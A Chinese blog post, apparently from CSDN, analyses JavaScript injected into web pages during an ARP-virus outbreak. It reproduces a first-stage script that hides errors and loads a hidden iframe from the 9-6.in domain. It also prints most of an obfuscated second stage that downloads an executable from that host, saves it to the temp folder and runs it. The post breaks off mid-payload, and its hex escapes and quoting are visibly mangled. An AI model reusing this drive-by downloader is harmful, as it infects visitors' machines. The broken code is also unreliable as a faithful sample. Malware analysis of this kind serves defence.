解析arp病毒背后利用的Javascript技术
请大家转载的时候注明引用出处(http://blog.csdn.net/michael_veking)以及作者信息(veking),谢谢!
本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁!
最近公司的网络中了这两天闹的很欢的ARP病毒,导致大家都无法上网,给工作带来了很大的不方便,在这里写下杀毒的过程,希望对大家能有帮助!
现象:打开部分网页显示为乱码,好像是随机行为,但细看又不像,因为它一直在监视msn.com,呵呵,可能和微软有仇吧,继续查看源代码,发现页面头部多了一个js文件链接----<script src=http://9-6.in/n.js></script>;
来源:经过一番网络搜索,发现这个域名是印度域名,而IP地址却是美国的,而且域名的注册日期是7月25日,看来一切都是预谋好了的,还是不管这个了,先解决问题吧;
分析:
1、先把(http://9-6.in/n.js)这个JS文件下载下来,代码如下:
-----------------------------------------------------------------------------------------------------------
// First-stage script served as n.js, reproduced from the infected page.
// Each document.writeln() below injects another <script> element into the
// host page while it is being parsed, so the payload runs in the context of
// whatever site the user was visiting.
// NOTE(review): several inner double quotes on the lines below are unescaped
// as reproduced here (e.g. src="..." inside a "..." literal) and the
// document.write() of the iframe has no quotes at all; the original sample
// presumably escaped them. Read this listing, do not expect it to parse.
// Detection hint: the marker cookie "Cookie1=POPWINDOS" and a <script> tag
// referencing the domain below in the <head> of unrelated pages are the
// observable signs the post describes.
document.writeln("<script>window.onerror=function(){return true;}</script>"); // a global error handler that returns true suppresses script errors, so any failure stays silent
document.writeln("<script src="http://9-6.in/S368/NewJs2.js"></script>"); // loads the second-stage script (the obfuscated NewJs2.js shown later in the post)
document.writeln("<script>");
document.writeln("function StartRun(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)"); // expiry = now + 24h: the marker cookie lives for one day
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = "Cookie1=" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)"); // has the Cookie1 marker already been set in this browser?
document.writeln("if (beginPosition != -1){ "); // marker present: do nothing, the payload already ran today
document.writeln("} else ");
document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() "); // first hit of the day: set the marker ...
document.writeln("document.write(<iframe width=0 height=0 src="http://9-6.IN/s368/T368.htm"></iframe>);"); // ... and load T368.htm in a 0x0 (invisible) iframe
document.writeln("}");
document.writeln("}");
document.writeln("StartRun();"); // runs immediately at page load
document.writeln("</script>")
-----------------------------------------------------------------------------------------------------------
其中第一句window.onerror=function(){return true;}就先把JS错误屏蔽掉,真够狠的,呵呵,不这样怎么隐藏自己呢,哈哈!然后还有个JS文件http://9-6.in/S368/NewJs2.js,先继续往下看,找到StartRun();运行一个函数,函数的主要作用是检查名为Cookie1的COOKIE是否存在:不存在时写入该COOKIE(有效期保存一天),并用隐藏框架加载一个文件(http://9-6.IN/s368/T368.htm);已存在则什么都不做,因此隐藏框架每天只加载一次,其余就没有什么特别的了;
2、下载(http://9-6.in/S368/NewJs2.js)这个文件,代码如下:
-----------------------------------------------------------------------------------------------------------
StrInfo = "x3cx73x63x72x69x70x74x3ex77x69x6ex64x6fx77x2ex6fx6ex65x72x72x6fx72x3dx66x75x6ex63x74x69x6fx6ex28x29x7bx72x65x74x75x72x6e x74x72x75x65x3bx7dx3cx2fx73x63x72x69x70x74x3e" +" "+
"x3cx73x63x72x69x70x74x3e" +" "+
" x44x5ax3d\\x78x36x38\x78x37x34\x78x37x34\x78x37x30\x78x33x41\x78x32x46\x78x32x46\x78x33x39\x78x32x44\x78x33x36\x78x32x45\x78x36x39\x78x36x45\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x45\x78x36x35\x78x37x38\x78x36x35\x3b" +" "+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +" "+
"x66x75x6ex63x74x69x6fx6e x47x6ex4dx73x28x6ex29 " +" "+
"x7b " +" "+
" x76x61x72 x6ex75x6dx62x65x72x4dx73 x3d x4dx61x74x68x2ex72x61x6ex64x6fx6dx28x29x2ax6ex3b" +" "+
" x72x65x74x75x72x6e \\x78x37x45\x78x35x34\x78x36x35\x78x36x44\x78x37x30\x2bx4dx61x74x68x2ex72x6fx75x6ex64x28x6ex75x6dx62x65x72x4dx73x29x2b\\x78x32x45\x78x37x34\x78x36x44\x78x37x30\x3b" +" "+
"x7d " +" "+
" x74x72x79 " +" "+
"x7b" +" "+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +" "+
" x76x61x72 x42x66x3dx64x6fx63x75x6dx65x6ex74x2ex63x72x65x61x74x65x45x6cx65x6dx65x6ex74x28"\x78x36x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x29x3b" +" "+
" x42x66x2ex73x65x74x41x74x74x72x69x62x75x74x65x28"\x78x36x33\x78x36x43\x78x36x31\x78x37x33\x78x37x33\x78x36x39\x78x36x34"x2c"\x78x36x33\x78x36x43\x78x37x33\x78x36x39\x78x36x34\x78x33x41\x78x34x32\x78x34x34\x78x33x39\x78x33x36\x78x34x33\x78x33x35\x78x33x35\x78x33x36\x78x32x44\x78x33x36\x78x33x35\x78x34x31\x78x33x33\x78x32x44\x78x33x31\x78x33x31\x78x34x34\x78x33x30\x78x32x44\x78x33x39\x78x33x38\x78x33x33\x78x34x31\x78x32x44\x78x33x30\x78x33x30\x78x34x33\x78x33x30\x78x33x34\x78x34x36\x78x34x33\x78x33x32\x78x33x39\x78x34x35\x78x33x33\x78x33x36"x29x3b" +" "+
" x76x61x72 x4bx78x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x44\x78x36x39\x78x36x33\x78x37x32\x78x36x46\x78x37x33\x78x36x46\x78x36x36\x78x37x34\x78x32x45\x78x35x38"x2b"\x78x34x44\x78x34x43\x78x34x38\x78x35x34\x78x35x34\x78x35x30"x2c""x29x3b" +" "+
" x76x61x72 x41x53x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x31\x78x36x34\x78x36x46\x78x36x34\x78x36x32\x78x32x45\x78x35x33\x78x37x34\x78x37x32\x78x36x35\x78x36x31\x78x36x44"x2c""x29x3b" +" "+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +" "+
" x41x53x2ex74x79x70x65x3dx31x3b" +" "+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +" "+
" x4bx78x2ex6fx70x65x6ex28"\x78x34x37\x78x34x35\x78x35x34"x2c x44x5ax2cx30x29x3b" +" "+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +" "+
" x4bx78x2ex73x65x6ex64x28x29x3b" +" "+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +" "+
" x4ex73x31x3dx47x6ex4dx73x28x39x39x39x39x29x3b" +" "+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +" "+
" x76x61x72 x63x46x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x33\x78x37x32\x78x36x39\x78x37x30\x78x37x34\x78x36x39\x78x36x45\x78x36x37\x78x32x45\x78x34x36\x78x36x39\x78x36x43\x78x36x35\x78x35x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x34x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x2c""x29x3b" +" "+
" x76x61x72 x4ex73x54x6dx70x3dx63x46x2ex47x65x74x53x70x65x63x69x61x6cx46x6fx6cx64x65x72x28x30x29x3b x4ex73x31x3d x63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2cx4ex73x31x29x3b x41x53x2ex4fx70x65x6ex28x29x3bx41x53x2ex57x72x69x74x65x28x4bx78x2ex72x65x73x70x6fx6ex73x65x42x6fx64x79x29x3b" +" "+
" x41x53x2ex53x61x76x65x54x6fx46x69x6cx65x28x4ex73x31x2cx32x29x3b x41x53x2ex43x6cx6fx73x65x28x29x3b x76x61x72 x71x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x38\x78x36x35\x78x36x43\x78x36x43\x78x32x45\x78x34x31\x78x37x30\x78x37x30\x78x36x43\x78x36x39\x78x36x33\x78x36x31\x78x37x34\x78x36x39\x78x36x46\x78x36x45"x2c""x29x3b" +" "+
" x6fx6bx31x3dx63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2b\\x78x35x43\x78x35x43\x78x37x33\x78x37x39\x78x37x33\x78x37x34
补充:web前端 , JavaScript ,